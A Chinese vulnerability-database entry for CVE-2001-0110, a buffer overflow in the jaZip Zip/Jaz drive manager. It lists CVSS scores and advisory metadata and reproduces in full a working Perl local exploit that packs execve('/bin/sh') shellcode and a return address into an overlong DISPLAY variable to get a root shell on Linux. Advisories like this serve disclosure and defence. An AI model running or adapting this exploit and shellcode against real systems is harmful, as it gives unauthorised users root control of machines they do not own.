| CVE-2001-0110 |
|
发布时间 :2001-03-12 00:00:00 |
| 修订时间 :2008-09-05 16:23:17 |
| NMCOE |
|
|
[原文]Buffer overflow in jaZip Zip/Jaz drive manager allows local users to gain root privileges via a long DISPLAY environmental variable.
[CNNVD]jaZip Zip/Jaz驱动管理器缓冲区溢出漏洞(CNNVD-200103-024) jaZip Zip/Jaz驱动管理器存在缓冲区溢出漏洞。本地用户借助超长DISPLAY环境变量提升根目录特权。
-
CVSS (基础分值)
| CVSS分值: |
7.2 |
[严重(HIGH)] |
| 机密性影响: |
COMPLETE |
[完全的信息泄露导致所有系统文件暴露] |
| 完整性影响: |
COMPLETE |
[系统完整性可被完全破坏] |
| 可用性影响: |
COMPLETE |
[可能导致系统完全宕机] |
| 攻击复杂度: |
LOW |
[漏洞利用没有访问限制 ] |
| 攻击向量: |
LOCAL |
[漏洞利用需要具有物理访问权限或本地帐户] |
| 身份认证: |
NONE |
[漏洞利用无需身份认证] |
-
CPE (受影响的平台与产品)
-
OVAL (用于检测的技术细节)
-
官方数据库链接
-
其它链接及资源
-
漏洞信息
|
jaZip Zip/Jaz驱动管理器缓冲区溢出漏洞 |
| 高危 |
缓冲区溢出 |
| 2001-03-12 00:00:00 |
2005-05-02 00:00:00 |
| 本地 |
|
|
| jaZip Zip/Jaz驱动管理器存在缓冲区溢出漏洞。本地用户借助超长DISPLAY环境变量提升根目录特权。 |
-
公告与补丁
-
漏洞信息 (257)
|
jaZip 0.32-2 Local Buffer Overflow Exploit
(EDBID:257)
|
| linux |
local |
| 2001-01-25 |
Verified |
| 0 |
teleh0r |
|
N/A |
[点击下载]
|
#!/usr/bin/perl
## jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000
## <teleh0r@doglover.com> || http://teleh0r.cjb.net/
## Vulnerable: Turbolinux 6.0
##
## [teleh0r@localhost teleh0r]$ rpm -q jaZip
## jaZip-0.32-2
## [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
## Address: 0xbffff7ac
## bash#
$shellcode = # Shellcode by: Taeho Oh
"\xeb\x1f". #/* jmp 0x1f */
"\x5e". #/* popl %esi */
"\x89\x76\x08". #/* movl %esi,0x8(%esi) */
"\x31\xc0". #/* xorl %eax,%eax */
"\x88\x46\x07". #/* movb %eax,0x7(%esi) */
"\x89\x46\x0c". #/* movl %eax,0xc(%esi) */
"\xb0\x0b". #/* movb $0xb,%al */
"\x89\xf3". #/* movl %esi,%ebx */
"\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */
"\xcd\x80". #/* int $0x80 */
"\x31\xdb". #/* xorl %ebx,%ebx */
"\x89\xd8". #/* movl %ebx,%eax */
"\x40". #/* inc %eax */
"\xcd\x80". #/* int $0x80 */
"\xe8\xdc\xff\xff\xff". #/* call -0x24 */
"/bin/sh"; #/* .string \"/bin/sh\" */
$ret = 0xbffff7ac; # May have to be modified.
$len = 2100;
$nop = 'A';
if (@ARGV == 1) {
$offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l',($ret + $offset));
$buffer .= $nop x 3; # May have to be modified / 5 for Debian.
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
if ($ENV{'DISPLAY'}) {
delete($ENV{'DISPLAY'});
}
local($ENV{'DISPLAY'}) = $buffer;
exec("/usr/X11R6/bin/jazip");
# milw0rm.com [2001-01-25]
-
漏洞信息
|
1728 |
|
Iomega JaZip DISPLAY Environment Variable Local Overflow |
|
Local Access Required |
Input Manipulation |
| Loss of Integrity |
|
| Exploit Public |
|
-
漏洞描述
-
时间线
|
2000-01-14 |
Unknow |
| Unknow |
Unknow |
-
解决方案
|
Products |
Unknown or Incomplete |
-
相关参考
-
漏洞作者
|
Follow yourself.